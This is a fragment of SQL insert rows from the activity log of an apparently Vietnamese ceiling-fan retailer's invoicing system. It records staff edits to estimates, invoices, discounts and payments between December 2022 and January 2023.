(1611, 'invoice', 244, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-16 12:13:06'),
(1612, 'invoice', 244, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-12-16 12:13:06'),
(1613, 'invoice', 244, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:51:\"Quạt trần tiết kiệm điện TOBAGO 52 BLACK\";}', '17', 'Loan Nguyễn', '2022-12-16 12:14:28'),
(1614, 'invoice', 244, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:66:\"Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)\";}', '17', 'Loan Nguyễn', '2022-12-16 12:14:28'),
(1615, 'invoice', 244, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-12-16 12:15:29'),
(1616, 'invoice', 245, 'invoice_activity_created', '', '18', 'Phương Mỹ', '2022-12-16 12:18:19'),
(1617, 'estimate', 147, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/245\">INV-DRAFT</a>\";}', '18', 'Phương Mỹ', '2022-12-16 12:18:19'),
(1618, 'invoice', 245, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '18', 'Phương Mỹ', '2022-12-16 12:19:09'),
(1619, 'invoice', 245, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:4:\"0 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/257\" target=\"_blank\">#257</a>\";}', '18', 'Phương Mỹ', '2022-12-16 12:19:09'),
(1620, 'invoice', 245, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '18', 'Phương Mỹ', '2022-12-16 14:47:12'),
(1621, 'invoice', 245, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.925.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/258\" target=\"_blank\">#258</a>\";}', '18', 'Phương Mỹ', '2022-12-16 14:47:12'),
(1622, 'invoice', 245, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"257\";i:1;s:4:\"0 đ\";}', '1', 'Ho Gia Phat', '2022-12-16 23:24:42'),
(1623, 'invoice', 245, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '16', 'Tuyền Ngọc', '2022-12-17 12:06:30'),
(1624, 'estimate', 141, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2022-12-18 09:51:01'),
(1625, 'estimate', 143, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2022-12-18 09:51:01'),
(1626, 'estimate', 152, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-12-19 10:10:40'),
(1627, 'estimate', 152, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2022-12-19 10:11:16'),
(1628, 'invoice', 246, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-12-19 10:26:26'),
(1629, 'estimate', 152, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/246\">INV-241-22</a>\";}', '17', 'Loan Nguyễn', '2022-12-19 10:26:26'),
(1630, 'invoice', 246, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2022-12-19 10:27:52'),
(1631, 'invoice', 246, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-19 14:16:58'),
(1632, 'invoice', 246, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.725.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/259\" target=\"_blank\">#259</a>\";}', '17', 'Loan Nguyễn', '2022-12-19 14:16:58'),
(1633, 'invoice', 227, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-21 13:52:09'),
(1634, 'invoice', 227, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"16.830.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/260\" target=\"_blank\">#260</a>\";}', '17', 'Loan Nguyễn', '2022-12-21 13:52:09'),
(1635, 'invoice', 247, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-21 17:04:43'),
(1636, 'invoice', 247, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"23800000.00\";i:1;s:8:\"18000000\";}', '1', 'Ho Gia Phat', '2022-12-21 17:22:24'),
(1637, 'invoice', 247, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2022-12-21 17:22:24'),
(1638, 'invoice', 247, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:29:\"Bộ đèn LED Haiku L series\";}', '1', 'Ho Gia Phat', '2022-12-21 17:22:24'),
(1639, 'invoice', 247, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-21 17:22:32'),
(1640, 'invoice', 247, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2022-12-21 17:22:32'),
(1641, 'estimate', 153, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2022-12-21 17:26:31'),
(1642, 'invoice', 247, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:88:\"Màu sáng : 2700K<br />\r\n (ánh sáng ấm trung tính)<br />\r\nCông suất 16W<br />\r\n\";i:1;s:68:\"Màu sáng : 2700K\r\n (ánh sáng ấm trung tính)\r\nCông suất 16W\";}', '17', 'Loan Nguyễn', '2022-12-22 10:58:30'),
(1643, 'invoice', 247, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-22 10:58:40'),
(1644, 'invoice', 247, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"20.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/261\" target=\"_blank\">#261</a>\";}', '17', 'Loan Nguyễn', '2022-12-22 10:58:40'),
(1645, 'estimate', 154, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-12-22 14:46:03'),
(1646, 'invoice', 248, 'invoice_activity_created', '', '16', 'Tuyền Ngọc', '2022-12-23 11:21:28'),
(1647, 'invoice', 248, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Quạt trần KATRINA Gray Dark Wood\";}', '16', 'Tuyền Ngọc', '2022-12-23 11:22:37'),
(1648, 'invoice', 248, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:40:\"Quạt trần KATRINA 52 Gray Maple Wood\";}', '16', 'Tuyền Ngọc', '2022-12-23 11:22:37'),
(1649, 'invoice', 248, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:551:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China    <br />\r\n\";i:1;s:497:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '16', 'Tuyền Ngọc', '2022-12-23 11:29:05'),
(1650, 'invoice', 248, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '16', 'Tuyền Ngọc', '2022-12-23 11:29:15'),
(1651, 'invoice', 248, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/262\" target=\"_blank\">#262</a>\";}', '16', 'Tuyền Ngọc', '2022-12-23 11:29:15'),
(1652, 'invoice', 249, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-12-23 14:13:24'),
(1653, 'estimate', 154, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/249\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2022-12-23 14:13:24'),
(1654, 'invoice', 249, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-23 14:13:40'),
(1655, 'invoice', 249, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2022-12-23 14:13:40'),
(1656, 'invoice', 249, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2022-12-23 14:15:07'),
(1657, 'invoice', 250, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-12-24 11:53:18'),
(1658, 'invoice', 250, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:29:\"Bộ đèn LED Haiku L series\";}', '1', 'Ho Gia Phat', '2022-12-24 11:55:39'),
(1659, 'invoice', 250, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-12-24 11:55:39'),
(1660, 'invoice', 250, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-24 11:56:00'),
(1661, 'invoice', 250, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2022-12-24 11:56:00'),
(1662, 'invoice', 250, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-12-24 11:58:21'),
(1663, 'invoice', 250, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/263\" target=\"_blank\">#263</a>\";}', '1', 'Ho Gia Phat', '2022-12-24 11:58:21'),
(1664, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"15\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2022-12-24 12:18:19'),
(1665, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"15\";i:1;s:1:\"0\";}', '1', 'Ho Gia Phat', '2022-12-24 12:18:19'),
(1666, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2022-12-24 15:27:18'),
(1667, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2022-12-24 15:27:18'),
(1668, 'invoice', 204, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:17:\"Sải cánh 210cm\";i:1;s:170:\"Sải cánh 210cm\r\nMàu thân quạt: Đen\r\nMàu cánh: Đen\r\nThiết kế tiêu chuẩn ngoài trời, chống ẩm, nước IPX2\r\nThương hiệu xuất xứ: Haiku/USA\";}', '1', 'Ho Gia Phat', '2022-12-26 10:38:36'),
(1669, 'invoice', 204, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:144:\"Sải cánh 142cm\r\nMàu động cơ: Đen\r\nMàu cánh: Dark Walnut\r\nThiết kế động cơ DC, công suất 35W\r\nThương hiệu: Tổ chức đào tạo WIT\";}', '1', 'Ho Gia Phat', '2022-12-26 10:38:36'),
(1670, 'invoice', 204, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"6.00\";i:2;s:1:\"3\";}', '1', 'Ho Gia Phat', '2022-12-26 10:38:36'),
(1671, 'invoice', 204, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-12-26 10:38:36'),
(1672, 'invoice', 204, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"3.00\";i:2;s:1:\"2\";}', '1', 'Ho Gia Phat', '2022-12-26 10:40:08'),
(1673, 'invoice', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 Black ABS\";}', '1', 'Ho Gia Phat', '2022-12-26 10:40:08'),
(1674, 'invoice', 204, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"2.00\";i:2;s:1:\"6\";}', '1', 'Ho Gia Phat', '2022-12-26 10:44:27'),
(1675, 'invoice', 204, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-12-26 10:45:13'),
(1676, 'invoice', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-12-26 10:45:13'),
(1677, 'invoice', 204, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"6.00\";i:2;s:1:\"5\";}', '1', 'Ho Gia Phat', '2022-12-26 11:04:53'),
(1678, 'invoice', 204, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 Black ABS\";}', '1', 'Ho Gia Phat', '2022-12-26 11:16:36'),
(1679, 'invoice', 204, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-12-26 11:16:36'),
(1680, 'invoice', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 Black ABS\";}', '1', 'Ho Gia Phat', '2022-12-26 11:16:36'),
(1681, 'invoice', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-12-26 11:16:36'),
(1682, 'invoice', 250, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-12-26 15:55:10'),
(1683, 'invoice', 250, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:21:\"Haiku L 44 inch Black\";}', '17', 'Loan Nguyễn', '2022-12-26 15:55:10'),
(1684, 'invoice', 250, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:21:\"Haiku L 52 inch Black\";}', '17', 'Loan Nguyễn', '2022-12-26 15:55:10'),
(1685, 'invoice', 250, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:27:\"Ống ty treo quạt trần\";}', '17', 'Loan Nguyễn', '2022-12-26 15:55:10'),
(1686, 'invoice', 250, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:52:\"Khấu trừ phí khui thùng quạt Haiku L 44 inch\";}', '17', 'Loan Nguyễn', '2022-12-26 15:55:10'),
(1687, 'invoice', 250, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-12-26 16:50:16'),
(1688, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"15\";i:1;s:1:\"0\";}', '17', 'Loan Nguyễn', '2022-12-26 17:13:10'),
(1689, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"15\";i:1;s:1:\"0\";}', '17', 'Loan Nguyễn', '2022-12-26 17:13:10'),
(1690, 'invoice', 250, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:29:\"Bộ đèn LED Haiku L series\";i:1;s:41:\"Khấu trừ chi phí khui Bộ đèn Led\";}', '17', 'Loan Nguyễn', '2022-12-26 17:43:43'),
(1691, 'invoice', 250, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"3500000.00\";i:1;s:9:\"350000.00\";}', '17', 'Loan Nguyễn', '2022-12-26 17:43:43'),
(1692, 'invoice', 250, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"1573000.00\";i:1;s:10:\"1850000.00\";}', '17', 'Loan Nguyễn', '2022-12-26 17:43:43'),
(1693, 'invoice', 250, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:319:\"Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";i:1;s:287:\"Sải cánh 132cm (52inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: Black  \r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";}', '17', 'Loan Nguyễn', '2022-12-26 17:44:52'),
(1694, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '17', 'Loan Nguyễn', '2022-12-26 17:48:15'),
(1695, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '17', 'Loan Nguyễn', '2022-12-26 17:48:15'),
(1696, 'invoice', 250, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '17', 'Loan Nguyễn', '2022-12-26 17:48:15'),
(1697, 'invoice', 249, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2022-12-27 10:31:02'),
(1698, 'invoice', 249, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"12.325.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/264\" target=\"_blank\">#264</a>\";}', '17', 'Loan Nguyễn', '2022-12-27 10:31:02'),
(1699, 'invoice', 204, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";i:1;s:4:\"5.00\";i:2;s:1:\"6\";}', '17', 'Loan Nguyễn', '2022-12-29 16:09:55'),
(1700, 'invoice', 204, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2022-12-31 09:17:15'),
(1701, 'estimate', 155, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2023-01-02 08:56:15'),
(1702, 'estimate', 156, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2023-01-02 08:58:04'),
(1703, 'estimate', 157, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-01-03 11:08:40'),
(1704, 'estimate', 157, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:432:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Dark Walnut   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n\";i:1;s:368:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Đen   \r\nMàu cánh: Dark Walnut   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-01-03 11:20:49'),
(1705, 'estimate', 157, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Phí tuỳ chỉnh màu sắc quạt\";}', '17', 'Loan Nguyễn', '2023-01-03 11:20:49'),
(1706, 'estimate', 157, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2023-01-03 11:20:49'),
(1707, 'estimate', 157, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";}', '17', 'Loan Nguyễn', '2023-01-03 11:20:49'),
(1708, 'estimate', 157, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:42:\"Chi phí quản lý, vận hành bàn giao\";}', '17', 'Loan Nguyễn', '2023-01-03 11:20:49'),
(1709, 'estimate', 157, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-01-03 11:29:27'),
(1710, 'estimate', 156, 'estimate_activity_client_declined', '', NULL, '', '2023-01-03 14:24:10'),
(1711, 'estimate', 156, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:42:\"Quạt trần cánh gỗ ONIX 56 Dark Wood\";}', '18', 'Phương Mỹ', '2023-01-03 14:26:35'),
(1712, 'estimate', 156, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '18', 'Phương Mỹ', '2023-01-03 14:26:35'),
(1713, 'estimate', 156, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:44:\"Quạt trần cánh gỗ ONIX 56 Sliver Wood\";}', '18', 'Phương Mỹ', '2023-01-03 14:26:35'),
(1714, 'estimate', 157, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '1', 'Ho Gia Phat', '2023-01-03 15:06:43'),
(1715, 'estimate', 157, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:42:\"Chi phí quản lý, vận hành bàn giao\";}', '1', 'Ho Gia Phat', '2023-01-03 15:06:43'),
(1716, 'estimate', 157, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:71:\"Màu sắc thân:  <br />\r\nMàu sắc cánh <br />\r\nMàu sắc ống ty\";i:1;s:60:\"Màu sắc thân:  \r\nMàu sắc cánh:\r\nMàu sắc ống ty:\";}', '1', 'Ho Gia Phat', '2023-01-03 15:06:43'),
(1717, 'estimate', 157, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"1800000.00\";i:1;s:9:\"800000.00\";}', '1', 'Ho Gia Phat', '2023-01-03 15:06:43'),
(1718, 'estimate', 157, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-01-03 15:06:43'),
(1719, 'estimate', 157, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '1', 'Ho Gia Phat', '2023-01-03 15:41:04'),
(1720, 'estimate', 157, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"800000.00\";i:1;s:10:\"1000000.00\";}', '1', 'Ho Gia Phat', '2023-01-03 15:41:04'),
(1721, 'estimate', 158, 'estimate_activity_created', '', '18', 'Phương Mỹ', '2023-01-04 10:04:04'),
(1722, 'estimate', 158, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '18', 'Phương Mỹ', '2023-01-04 11:57:24'),
(1723, 'estimate', 158, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8600000.00\";i:1;s:7:\"5890000\";}', '18', 'Phương Mỹ', '2023-01-04 12:14:05'),
